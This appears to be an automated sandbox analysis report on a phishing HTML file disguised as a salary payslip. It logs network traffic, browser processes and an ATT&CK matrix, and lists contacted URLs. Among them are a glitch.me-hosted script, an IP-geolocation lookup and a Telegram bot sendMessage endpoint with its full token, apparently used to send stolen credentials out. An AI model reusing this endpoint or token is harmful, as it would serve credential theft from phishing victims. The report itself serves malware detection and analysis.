          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49910 version: TLS 1.2

          System Summary

          barindex
          Source: Name includes: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlInitial sample: payslip
          Source: classification engineClassification label: mal92.phis.troj.winHTML@26/312@38/13
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2024,i,11557377144956584876,17770760742759118039,262144 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2024,i,11557377144956584876,17770760742759118039,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.htmlHTTP Parser: file:///C:/Users/user/Desktop/Itnaledi%20Salary_%20Payslip%20_%20Updates4C79949D7C31_pdf.html
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/products2-300x211.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?ver=4.1.40%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/cisco.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient-child/style.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.90%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpg);0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3-300x211.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=538580%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/petrosa.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/print-audit.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-includes/js/wp-emoji-release.min.js?ver=6.1.70%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/animate.min.css?ver=6.9.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.90%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1-300x128.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/lexmark.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/2.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-json/0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft-1-300x211.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/mission-blue.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-270x270.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.20%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.00%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/site.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/BYTES.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?v0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.m0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-includes/js/comment-reply.min.js?ver=6.1.70%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/skin-material.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/logo-COLOUR.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/western-cape.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/palo-alto.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/xmlrpc.php?rsd0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/comments/feed/0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/cherwell.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?v0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?ver=7.0.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-32x32.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/#website0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/meat-market.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-includes/js/jquery/jquery.min.js?ver=3.6.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/ibm.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/building-industry.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/salient/menu-dynamic.css?ver=260580%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=150%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-192x192.png0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/DIMENSION.jpg0%Avira URL Cloudsafe
          https://branched-versed-session.glitch.me/AD.js0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/2-300x128.jpg0%Avira URL Cloudsafe
          https://www.yeastar.com0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-json/wp/v2/pages/5510%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.60%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.itnaledi.co.za%2F&#038;for0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=6.9.10%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/dell.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/trend.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/11/yeastar.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-button-legacy.css?ve0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/intersection-observer.min.js?ver=2.6.20%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1.jpg0%Avira URL Cloudsafe
          https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-180x180.png0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          d26p066pn2w0s0.cloudfront.net
          13.227.8.72
          truefalse
            high
            branched-versed-session.glitch.me
            23.21.241.83
            truefalse
              unknown
              code.jquery.com
              151.101.130.137
              truefalse
                high
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  www.itnaledi.co.za
                  196.22.142.143
                  truefalse
                    unknown
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      high
                      www.google.com
                      142.250.181.100
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              logo.clearbit.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?ver=4.1.4false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.1false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient-child/style.css?ver=15.0.6false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/cisco.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.9false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=53858false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/petrosa.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/print-audit.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-includes/js/wp-emoji-release.min.js?ver=6.1.7false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/animate.min.css?ver=6.9.1false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.9false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/lexmark.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/2.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.6false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/02/mission-blue.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.0false
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/site.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.itnaledi.co.za/wp-content/uploads/2018/03/BYTES.jpgfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.jsfalse
                                  high
                                  https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.giffalse
                                    high
                                    https://www.itnaledi.co.za/wp-includes/js/comment-reply.min.js?ver=6.1.7false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ip-api.com/json/?fields=status,country,regionName,city,queryfalse
                                      high
                                      https://www.itnaledi.co.za/wp-content/themes/salient/css/build/skin-material.css?ver=15.0.6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/02/logo-COLOUR.pngfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/western-cape.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/palo-alto.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/cherwell.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?ver=7.0.1false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-32x32.pngfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15.0.6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/meat-market.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-includes/js/jquery/jquery.min.js?ver=3.6.1false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/ibm.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/salient/menu-dynamic.css?ver=26058false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.itnaledi.co.za/wp-content/uploads/2018/03/building-industry.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.telegram.org/bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessagefalse
                                        high
                                        https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3.pngfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.itnaledi.co.za/wp-content/uploads/2018/03/DIMENSION.jpgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.itnaledi.co.za/false
                                          unknown
                                          https://branched-versed-session.glitch.me/AD.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.6false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=6.9.1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.itnaledi.co.za/wp-content/uploads/2018/03/dell.jpgfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://code.jquery.com/jquery-3.3.1.slim.min.jsfalse
                                            high
                                            https://www.itnaledi.co.za/wp-content/uploads/2018/03/trend.jpgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.itnaledi.co.za/wp-content/uploads/2018/11/yeastar.jpgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/intersection-observer.min.js?ver=2.6.2false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1.jpgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.broofa.comchromecache_299.2.dr, chromecache_309.2.drfalse
                                              high
                                              https://www.itnaledi.co.za/wp-content/uploads/2018/02/products2-300x211.pngchromecache_324.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpg);chromecache_324.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://g.co/dev/maps-no-accountchromecache_299.2.dr, chromecache_309.2.drfalse
                                                high
                                                https://www.itnaledi.co.za/wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=1chromecache_324.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3-300x211.pngchromecache_324.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.itnaledi.co.za/wp-includes/wlwmanifest.xmlchromecache_324.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.google.comchromecache_283.2.dr, chromecache_150.2.drfalse
                                                  high
                                                  https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1-300x128.jpgchromecache_324.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
